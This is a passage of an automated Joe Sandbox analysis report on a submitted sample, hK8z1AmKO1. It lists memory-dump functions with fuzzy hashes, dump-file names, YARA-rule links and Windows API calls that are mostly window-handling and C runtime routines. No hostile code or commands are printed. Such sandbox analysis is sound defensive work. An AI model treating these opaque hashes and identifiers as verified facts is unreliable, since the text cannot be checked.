Opcode Fuzzy Hash: de48d3e4216346382547d154f22dc35636a39dcb985a9a9b5c508ea154b6320a
Instruction Fuzzy Hash: 5112C0B16047068BC728EF28C9D06BAB3E0FB54308F14897EE59BC7A91D774E895CB45

Function 00B7BE13 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f921306f0e774b51d8f8753383afdc1c573c59c2b67d31789e059115d582cee6
Instruction ID: b98fe5c679073be24524f3a67ecea22319196c4585d398b446131069b56a60ac
Opcode Fuzzy Hash: f921306f0e774b51d8f8753383afdc1c573c59c2b67d31789e059115d582cee6
Instruction Fuzzy Hash: 18F18D716083019FC718CF29C484A6EBBF1EFC9314F558AAEF4A997352D730E9458B86

Function 00B90B43 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: bc37d0f0e12b566b336ac64f5d7d066607274b6d28701a66c956f9a5190d61f3
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: D7C19E362250930EDF2D5679857413FBAE1DAA2BB131A07FDD4B2CB1C4FE24D924DA20

Function 00B90F78 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 1e02774feb46b8b1fcb4e771224f76226b7f1438450573a5b83286eff0d4574d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 33C174362191930ADF2D463D857413FBAF19A927B131A0BFDD4B2CB1C5FE24D964E620

Function 00B9070E Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 6ec1092ef80b780c0269ee66d0e821cf98dfb3f2a8c2273852aa5d90889c81ac
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 03C190362251930EDF2D5679857403FBAE19EA2BB131A07FDD4B2CB1C5FE24D924DA20

Function 00B86646 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 62e41403893d999201aed8ecd3873678773e8031a9e0b907e15a980cd4a0247e
Instruction ID: 590eed2bd042e038536449d22ed92ed3f5631ccfdcef869f96946302ceeafeaf
Opcode Fuzzy Hash: 62e41403893d999201aed8ecd3873678773e8031a9e0b907e15a980cd4a0247e
Instruction Fuzzy Hash: DCD1E6B1A043468FDB14EF28C88075BBBE0FF55308F0445ADE8499B762D734E959CB96

Function 00B902F6 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 125a52f241a63bc2a09f50b080bc7af6f97be1dcd3d0a8916a056e08f16146ab
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: C8C1A2362291930EDF2D5639857403FBAF19AA27B131A07FDD4B2CB1D4FE24D924DA20

Function 00B7E2A0 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfb01bae8cf006435a7385f968f1f67aacf72977185b472fc744bafa7fc03259
Instruction ID: 648f11f89bcb15d1349f176f995ff311f32db36759cbcf03dddba8bf5bd25ac6
Opcode Fuzzy Hash: bfb01bae8cf006435a7385f968f1f67aacf72977185b472fc744bafa7fc03259
Instruction Fuzzy Hash: 8CE179745083848FC314CF29D49096ABBF0BF8A300F854A9EF5D597352D7B9E919CB62

Function 00B83A3C Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction ID: 829da68fea1cdd3bd9a4a7de4697f527b4d4f19b94921fd58f68ca97cf23fe18
Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
Instruction Fuzzy Hash: 939156B02047498BDB28FF68C8D1BBE73D5EB80B00F1049ADE59787292EB75DA45C742

Function 00B94969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3506dee3ea48a8b7dff80fe975c65ed9d6369cfe4a9c52a7e0254b6beb4489f1
Instruction ID: 6b4df5edd40b7397aa376633e22a009867cdb74fd7b7ab0546db9ab08bbfbeb8
Opcode Fuzzy Hash: 3506dee3ea48a8b7dff80fe975c65ed9d6369cfe4a9c52a7e0254b6beb4489f1
Instruction Fuzzy Hash: 1E617871680B086BDE389A288896FBF33D8EB41700F140AFAE883DB281D751DD43C759

Function 00B83D6D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction ID: 01b536785afd3e4e9495b245c3ababc3d6639e97bbe4ea749e18dbddbc013809
Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction Fuzzy Hash: EF712E716043454FDB24FF28C8D1B6D77E5EBD0F04F0049ADE9868B292DA74DA85C792

Function 00B9473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction ID: 04065c78939482d83f2d903ebb044d699fe64c310776e19016fc5998cb7e9445
Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction Fuzzy Hash: B9514770600A8C6BDF398AA889D5FBF27C9DB53304F1809F9E982D7292C319DD478352

Function 00B7DE6C Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50888e04376485e1b22b05621a50218f50ae0dc5e5d3f0152b31d9b62fc13a9c
Instruction ID: 60b935de3c5a2b4ccc490d51a43e520db82911033d6a416fc3d16328ead786bd
Opcode Fuzzy Hash: 50888e04376485e1b22b05621a50218f50ae0dc5e5d3f0152b31d9b62fc13a9c
Instruction Fuzzy Hash: F781AF8120D2D49FC7264F7D38E42B53FE15B77240B1842FAC4DA87263D9FA4A58D722

Function 00B7E8A0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b21418e0d81c1357c4a315d3f99fe6b0541581d5957e66a70510f6ca3029a548
Instruction ID: dac4c338ece8b5327a385b51ffa75679f43e337ccfc159d71ee2edead1af4bb3
Opcode Fuzzy Hash: b21418e0d81c1357c4a315d3f99fe6b0541581d5957e66a70510f6ca3029a548
Instruction Fuzzy Hash: 2A516D315083954FC712CF29918446EBFE1BE9A314F5A89DEE4F95B213D330D649CBA2

Function 00B7F968 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f237376beeef5427cd2afe957e59951dc3c13d518d3bad183c61c9fa783cb7be
Instruction ID: e36df778223375f6f028d717a85af08042e1317ed575ba730fb5b5b4cd332dfa
Opcode Fuzzy Hash: f237376beeef5427cd2afe957e59951dc3c13d518d3bad183c61c9fa783cb7be
Instruction Fuzzy Hash: EF512671A083128BC748CF19D48055AF7E1FFC8354F058A2EE899A7740DB34E959CB9A

Function 00B837C1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: 12fa45d8af39581857cdd785b37af3841e6732a1f69f5d790a3717d10cd498c4
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: 7B31E3B56047458FCB14EF28C85266EBBE0FB95700F10896DE499C7342C779EE49CB92

Function 00B75F3C Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23480110dd4950bf6f45acb355cd7354a4234cc461b1cf496f49ff5034c00c68
Instruction ID: e02e6b7970b9b979f0759e1f1d62b59da0dcd4ca1b2aaaaa17d15261fc274bdb
Opcode Fuzzy Hash: 23480110dd4950bf6f45acb355cd7354a4234cc461b1cf496f49ff5034c00c68
Instruction Fuzzy Hash: 76212932A201214BCB58CF2DDCE187A7791E787311746C26FEE56CB2D0C935E924C7A0

Function 00B7DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B7DABE

Part of subcall function 00B7400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B7401D

Part of subcall function 00B81596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BB0EE8,00000200,00B7D202,00000000,?,00000050,00BB0EE8), ref: 00B815B3

_strlen.LIBCMT ref: 00B7DADF
SetDlgItemTextW.USER32(?,00BAE154,?), ref: 00B7DB3F
GetWindowRect.USER32(?,?), ref: 00B7DB79
GetClientRect.USER32(?,?), ref: 00B7DB85
GetWindowLongW.USER32(?,000000F0), ref: 00B7DC25
GetWindowRect.USER32(?,?), ref: 00B7DC52
SetWindowTextW.USER32(?,?), ref: 00B7DC95
GetSystemMetrics.USER32(00000008), ref: 00B7DC9D
GetWindow.USER32(?,00000005), ref: 00B7DCA8
GetWindowRect.USER32(00000000,?), ref: 00B7DCD5
GetWindow.USER32(00000000,00000002), ref: 00B7DD47

Strings

CAPTION, xrefs: 00B7DC77
$%s:, xrefs: 00B7DAB2
d, xrefs: 00B7DBA5

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 72b325ed97d0ac6bbe0da9ed564396cb367021e320a72896e86dad6c0bf94d88
Instruction ID: 685edbfe752edee6750ee83dd70f3210b638eba6dd7f8ff16daa90d03b56e944
Opcode Fuzzy Hash: 72b325ed97d0ac6bbe0da9ed564396cb367021e320a72896e86dad6c0bf94d88
Instruction Fuzzy Hash: A081C171108341AFD710DF68CC85E6BBBF9EF88704F04896DFA99A3290D670E809CB52

Function 00B9C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00B9C277

Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BE2F
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BE41
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BE53
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BE65
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BE77
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BE89
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BE9B
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BEAD
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BEBF
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BED1
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BEE3
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BEF5
Part of subcall function 00B9BE12: _free.LIBCMT ref: 00B9BF07

_free.LIBCMT ref: 00B9C26C

Part of subcall function 00B984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?), ref: 00B984F4
Part of subcall function 00B984DE: GetLastError.KERNEL32(?,?,00B9BFA7,?,00000000,?,00000000,?,00B9BFCE,?,00000007,?,?,00B9C3CB,?,?), ref: 00B98506

_free.LIBCMT ref: 00B9C28E
_free.LIBCMT ref: 00B9C2A3
_free.LIBCMT ref: 00B9C2AE
_free.LIBCMT ref: 00B9C2D0
_free.LIBCMT ref: 00B9C2E3
_free.LIBCMT ref: 00B9C2F1
_free.LIBCMT ref: 00B9C2FC
_free.LIBCMT ref: 00B9C334
_free.LIBCMT ref: 00B9C33B
_free.LIBCMT ref: 00B9C358
_free.LIBCMT ref: 00B9C370

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e359666a1b3fe34cee4f759e2d4052c6ba6e85ce751484e8fbc9bfdc69c5dae1
Instruction ID: 6c5589c1ac3cbd6952ca5c8c3004cae047c52a70ca0b6ccca1003ee1560b48a8
Opcode Fuzzy Hash: e359666a1b3fe34cee4f759e2d4052c6ba6e85ce751484e8fbc9bfdc69c5dae1
Instruction Fuzzy Hash: 8F318B326042059FEF20AB78D945B5A7BEAFF02310F1184BAE458DB691DF31FC409B24

Function 00B8CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00B8CD51
GetClassNameW.USER32(00000000,?,00000800), ref: 00B8CD7D

Part of subcall function 00B817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B7BB05,00000000,.exe,?,?,00000800,?,?,00B885DF,?), ref: 00B817C2

GetWindowLongW.USER32(00000000,000000F0), ref: 00B8CD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B8CDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 00B8CDC4
